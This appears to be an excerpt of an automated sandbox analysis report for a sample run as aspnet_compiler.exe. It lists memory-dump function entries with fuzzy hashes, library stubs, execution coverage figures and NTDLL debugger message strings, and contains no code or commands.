Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef29f24d70d6edb62db6db67e9e6db91d28c6f1fee951b63be9422dd3dde91b
Instruction ID: 881d06e067df76500ae6fdf5a8be87078076a944d00bb8405278d58d9d21b66b
Opcode Fuzzy Hash: 3ef29f24d70d6edb62db6db67e9e6db91d28c6f1fee951b63be9422dd3dde91b
Instruction Fuzzy Hash: A0413A70E046289BDF14CFAAD99059DFBF3BFC9304F28C529D518AB259DB309942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A91271 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 780301d59cf713057404f2b70e5582f21a5f8d34729930c28aa9ea83ca35904c
Instruction ID: 094050c6d3afc1005955e6947b03362b219ce350109990946d07a2d2cafbee0c
Opcode Fuzzy Hash: 780301d59cf713057404f2b70e5582f21a5f8d34729930c28aa9ea83ca35904c
Instruction Fuzzy Hash: EA51B4B1E097848FE706CF669C1878ABFB7AF96204F09C4EEC8449A156E7304545CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A98C20 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2b092ff344e545c131f79a315bdf820777227ee8835650fb19238114f5b0d1
Instruction ID: 15a72b6b58e8cb2283ced9f6cd3d730cdce7dc69874a773b9cc613686db37208
Opcode Fuzzy Hash: 3c2b092ff344e545c131f79a315bdf820777227ee8835650fb19238114f5b0d1
Instruction Fuzzy Hash: 8C513974E15218DFDB04CFA9D994A9EBBF2BF89300F20816AD805AB365DB349D41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A96760 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8fb3fa4ce89efedbf1c0f99c3a4a12c353a69313eb95e10800f31be3868c1ea
Instruction ID: 2a6465f23b0a490c91606d470774e16de5a35839ad5eeb90fef1f314725e1865
Opcode Fuzzy Hash: c8fb3fa4ce89efedbf1c0f99c3a4a12c353a69313eb95e10800f31be3868c1ea
Instruction Fuzzy Hash: A74117B4E0560ADFCF44CFEAC5815AEFBF2AF89300F24D46AC515E7254D7349A428B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A96770 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac9268ed53cf904a7dfdbe4e174381ebf3bb35b7bb1f0af4eba07eb20e6e65f
Instruction ID: 0ae17db475bfd9d8ef4d54f9fc164f0fd66672089694bad9e99afc5b1fd9b18f
Opcode Fuzzy Hash: fac9268ed53cf904a7dfdbe4e174381ebf3bb35b7bb1f0af4eba07eb20e6e65f
Instruction Fuzzy Hash: 5441E2B4E0560ADBCF48CFAAC5815AEFBF2BF89300F24D46AC515A7214D7349A428B94

Uniqueness

Uniqueness Score: -1.00%

Function 00A91340 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463fd26eaa3b8921606d7b40915741a2d22e97bb50e135be1a839e25a260740c
Instruction ID: c49aa677e9b0e0dadb2ea3f909da08e601be1946e4a93c3b2f08171c3e9832f4
Opcode Fuzzy Hash: 463fd26eaa3b8921606d7b40915741a2d22e97bb50e135be1a839e25a260740c
Instruction Fuzzy Hash: F831DA71E046198FEB58CFABD840B9EBBF3AFC9300F04C1AAD908A7254DB3059458F65

Uniqueness

Uniqueness Score: -1.00%

Function 00A997E0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec49245f00a6e82a22af47b7e10647f4a097f27e2d925368366fccc89ab718e
Instruction ID: 1d324ef824d081ce2b172021532de99b7ae564f7177b667845369b907b1d3002
Opcode Fuzzy Hash: 1ec49245f00a6e82a22af47b7e10647f4a097f27e2d925368366fccc89ab718e
Instruction Fuzzy Hash: 0931A9B1E056589BDB59CF6BDC546CEFAF3AFC9300F14C1AAD40CA6264DB3409458E51

Uniqueness

Uniqueness Score: -1.00%

Function 00A997F0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5835102cff4b76dfe59219d36499b1732ba9a0955a423bb031e38af6bf98e12
Instruction ID: 2c2c8310a406cddba1b5372b00142a5d164a23701b16a49f05dea57d0cd7d141
Opcode Fuzzy Hash: a5835102cff4b76dfe59219d36499b1732ba9a0955a423bb031e38af6bf98e12
Instruction Fuzzy Hash: 51319D71E056289BDB6CCF6BDD446CEFAF3AFD9300F14C1BA950CA6224DB7049818E51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspnet_compiler.exePID: 6120, Parent PID: 5840COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	53.1%
Total number of Nodes:	1351
Total number of Limit Nodes:	62

Executed Functions

Function 01119910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111991A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e53247998dbc298a1fd98d77ca844cfddc3eda311a327353a80063ee728ddfd
Instruction ID: 9486cc1d3b18c3ce5efa5a3ae9b6d42db72b97bb28bfd720e085486230feca06
Opcode Fuzzy Hash: 3e53247998dbc298a1fd98d77ca844cfddc3eda311a327353a80063ee728ddfd
Instruction Fuzzy Hash: A79002B120101402D544719995047460005A7D0351F61C015E9055654EC7998DF576A5

Uniqueness

Uniqueness Score: -1.00%

Function 01119540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111954A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e20f7079274de4d2542a4d7b24797d455f23cae3468f433b7367910bda4db7f
Instruction ID: 9c946cdcfccfaa23cf8219be0b1b9c4777789b9570551dda01eaf3c741b5ccad
Opcode Fuzzy Hash: 2e20f7079274de4d2542a4d7b24797d455f23cae3468f433b7367910bda4db7f
Instruction Fuzzy Hash: 2C900265211010030509A59957045070046A7D53A1361C025F5006650CD76188716161

Uniqueness

Uniqueness Score: -1.00%

Function 011199A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011199AA

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b530eb734289032fd980faa278b867c8bf13fcf59e2203f7bca7c89058c87d91
Instruction ID: df2d6f818fede6dd618d5934d6a2019c5c2016893ed6a801d1b261c446e94a36
Opcode Fuzzy Hash: b530eb734289032fd980faa278b867c8bf13fcf59e2203f7bca7c89058c87d91
Instruction Fuzzy Hash: B99002A134101442D50461999514B060005E7E1351F61C019E5055654DC759CC727166

Uniqueness

Uniqueness Score: -1.00%

Function 011195D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011195DA

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b494186c5dfdfb0d616de52ca4eb00f357901e7913c6b0277162c984b1a19fcb
Instruction ID: 2630982460cc9bb866ca5751bb89712a994a938dc2e474484c9c93278ef8383a
Opcode Fuzzy Hash: b494186c5dfdfb0d616de52ca4eb00f357901e7913c6b0277162c984b1a19fcb
Instruction Fuzzy Hash: 9B9002A120201003450971999514616400AA7E0251B61C025E5005690DC66588B17165

Uniqueness

Uniqueness Score: -1.00%

Function 01119840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111984A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc9cd1eab23179f35719fdc38f40d1f4edf241ebbaa94ec98eb11a6128d97f07
Instruction ID: 5b3af212f7814570e667dee61e62cc311ff99a7ee086df951c5989f1cdd1d199
Opcode Fuzzy Hash: bc9cd1eab23179f35719fdc38f40d1f4edf241ebbaa94ec98eb11a6128d97f07
Instruction Fuzzy Hash: A8900261242051525949B19995045074006B7E02917A1C016E5405A50CC6669876E661

Uniqueness

Uniqueness Score: -1.00%

Function 01119860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111986A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3926b954b8ee20d06784c2905368813e8e80e3673d5dbe0a9285fa8e8726ade7
Instruction ID: 2bcc9dd55da5ede537f28424272c2f88d73f61d4370d509b6d5df743481a23d5
Opcode Fuzzy Hash: 3926b954b8ee20d06784c2905368813e8e80e3673d5dbe0a9285fa8e8726ade7
Instruction Fuzzy Hash: 0D90027120101413D515619996047070009A7D0291FA1C416E4415658DD7968972B161

Uniqueness

Uniqueness Score: -1.00%

Function 011198F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011198FA

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fca1a13abd58c2ff52322ccd4ad84c6dc1bc5732e2660748586b9d8e5f6160d5
Instruction ID: b6c13847c0eaaf697d989598babd5d3e96491dc0a103dba5189c89d8dbf286a3
Opcode Fuzzy Hash: fca1a13abd58c2ff52322ccd4ad84c6dc1bc5732e2660748586b9d8e5f6160d5
Instruction Fuzzy Hash: C790026160101502D50571999504616000AA7D0291FA1C026E5015655ECB6589B2B171

Uniqueness

Uniqueness Score: -1.00%

Function 01119710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111971A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f985865fcfcdff2127306121dc1a2d48daf6bfde16699e4faaa102a64f1ac25a
Instruction ID: 2bf2d207c69fea2b93a281bb4fe1231f1494c0f9e60b45328b6353ec23164d4e
Opcode Fuzzy Hash: f985865fcfcdff2127306121dc1a2d48daf6bfde16699e4faaa102a64f1ac25a
Instruction Fuzzy Hash: 7290027120101402D50465D9A5086460005A7E0351F61D015E9015655EC7A588B17171

Uniqueness

Uniqueness Score: -1.00%

Function 01119780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111978A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1fafd531dd15181acb611712daaa65ac09ac6b4c6ea241b44e7b3049e6215e48
Instruction ID: 53badfcdb4d8e120fffe466bcd30829edb2bc54b68754d31c8d072b442bbdcd7
Opcode Fuzzy Hash: 1fafd531dd15181acb611712daaa65ac09ac6b4c6ea241b44e7b3049e6215e48
Instruction Fuzzy Hash: 0A90026921301002D5847199A50860A0005A7D1252FA1D419E4006658CCA5588796361

Uniqueness

Uniqueness Score: -1.00%

Function 011197A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011197AA

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ac1c1820f54b35fab645067a5519f23f7674a722c3beecdba88a4f7bbf37573
Instruction ID: 294d1b501fa45242bb7a484fab16947df4cc5041c7edc0fa01008693e68df273
Opcode Fuzzy Hash: 1ac1c1820f54b35fab645067a5519f23f7674a722c3beecdba88a4f7bbf37573
Instruction Fuzzy Hash: CD90026130101003D5447199A5186064005F7E1351F61D015E4405654CDA5588766262

Uniqueness

Uniqueness Score: -1.00%

Function 01119A00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01119A0A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 099c10f668c7f9772410e52085cbc3dd53305a9061ef4fc1a3b86619d80bc3fe
Instruction ID: de939ef470ba2420657afec4536226d8224f32b18986ce713050b461c2f1c11f
Opcode Fuzzy Hash: 099c10f668c7f9772410e52085cbc3dd53305a9061ef4fc1a3b86619d80bc3fe
Instruction Fuzzy Hash: 2790027120141402D5046199991470B0005A7D0352F61C015E5155655DC765887175B1

Uniqueness

Uniqueness Score: -1.00%

Function 01119A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01119A2A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2eb4946728fd3449499ca278f016534b27ddbe10e66f9e67e182648ff594e167
Instruction ID: 8f52d584df18a6568ff3da10564bab1fb05c6c72edb804c7c4b73512aebbbcd9
Opcode Fuzzy Hash: 2eb4946728fd3449499ca278f016534b27ddbe10e66f9e67e182648ff594e167
Instruction Fuzzy Hash: 9690026160101042454471A9D9449064005BBE1261761C125E4989650DC699887566A5

Uniqueness

Uniqueness Score: -1.00%

Function 01119A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01119A5A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d957845d3ae6b20c30ee6bd7b3e9ab8f3a285e1f5a65024da9f807717bc3cfd
Instruction ID: 5cfcf0940eed5bdbcc38245ef3697cd9f39b0ee6d5b91e5e7b58890e526068a1
Opcode Fuzzy Hash: 6d957845d3ae6b20c30ee6bd7b3e9ab8f3a285e1f5a65024da9f807717bc3cfd
Instruction Fuzzy Hash: A090026121181042D60465A99D14B070005A7D0353F61C119E4145654CCA5588716561

Uniqueness

Uniqueness Score: -1.00%

Function 01119660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0111966A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10c8cb3c095e40f78a09c790fcb6630620d31b2e2533760a39a3746450230580
Instruction ID: ae9e9eb0b37cb4c17195ff06c39a0dadfdfa8ab93a5363c378eeded77477130d
Opcode Fuzzy Hash: 10c8cb3c095e40f78a09c790fcb6630620d31b2e2533760a39a3746450230580
Instruction Fuzzy Hash: 4290027120101802D5847199950464A0005A7D1351FA1C019E4016754DCB558A7977E1

Uniqueness

Uniqueness Score: -1.00%

Function 011196E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011196EA

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: afd2e2dcade5f6d1d8d9855b6e85f6edff9586e131ba8c79ed09f227012a4e13
Instruction ID: dff0f26f3bc4e5af200707eef734db829012e0d0f2ec562a9db65fb664c15a89
Opcode Fuzzy Hash: afd2e2dcade5f6d1d8d9855b6e85f6edff9586e131ba8c79ed09f227012a4e13
Instruction Fuzzy Hash: 6A90027120109802D5146199D50474A0005A7D0351F65C415E8415758DC7D588B17161

Uniqueness

Uniqueness Score: -1.00%

Function 0111967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01119694

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50d9415d809c896b7e3b92464a5248eae664a7bf32f2ff9c97b9a68877690078
Instruction ID: 1d75fa1808629cf26ab5f969e1c8f6eafa02cdbd2aa2f8dfdf15a1c9968d71b5
Opcode Fuzzy Hash: 50d9415d809c896b7e3b92464a5248eae664a7bf32f2ff9c97b9a68877690078
Instruction Fuzzy Hash: E9B09BB19015D5C5DA15D7A45708717790077D0755F26C465D2120741F4778C0A1F5B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041F001 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367616867.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_41f000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3886dbc1a3ed0d5877dc3917011568d40b1d55a1c7200a7aede51b6b77e83239
Instruction ID: 5f27a1068eabe3ad69184c2761e7599b127dbd0541bec6a2d7907e16f12ca617
Opcode Fuzzy Hash: 3886dbc1a3ed0d5877dc3917011568d40b1d55a1c7200a7aede51b6b77e83239
Instruction Fuzzy Hash: 38F059B7A01100DFD200DE39DCD3A913770F71432C764134EC561D7286D3388542CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041F067 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367616867.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_41f000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ade4b8e60e923e5c45076b23003e904a81f74ff90c4668260fa8058f09638da
Instruction ID: 0cb758de072376364a946d1f08bddd1c85952aa2ceea150bbd23eaeb43ca90b1
Opcode Fuzzy Hash: 6ade4b8e60e923e5c45076b23003e904a81f74ff90c4668260fa8058f09638da
Instruction Fuzzy Hash: 21B092B89592194E4721AEA596869943B61EE01709B0102CEADA94B5338A36809386C9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367616867.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_41f000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3df612203db1050245de8556794609f8a22a924f0f1424fbda9286918147f4
Instruction ID: 318487e5e0aea3dc49f7eb1cd4554a1f15d8c32a5429445fd8a7697016cc2948
Opcode Fuzzy Hash: 2f3df612203db1050245de8556794609f8a22a924f0f1424fbda9286918147f4
Instruction Fuzzy Hash: 0FA022A0C0830C03002030FA2A83023B32CC000A08F0003EAAE8C022023C02A83200EB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0118B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 0118B51C
This failed because of error %Ix., xrefs: 0118B446
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0118B476
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0118B47D
*** Inpage error in %ws:%s, xrefs: 0118B418
The instruction at %p referenced memory at %p., xrefs: 0118B432
*** Resource timeout (%p) in %ws:%s, xrefs: 0118B352
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0118B2DC
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0118B2F3
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0118B314
an invalid address, %p, xrefs: 0118B4CF
*** enter .cxr %p for the context, xrefs: 0118B50D
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0118B39B
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0118B484
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0118B305
Go determine why that thread has not released the critical section., xrefs: 0118B3C5
*** An Access Violation occurred in %ws:%s, xrefs: 0118B48F
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0118B3D6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0118B53F
read from, xrefs: 0118B4AD, 0118B4B2
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0118B38F
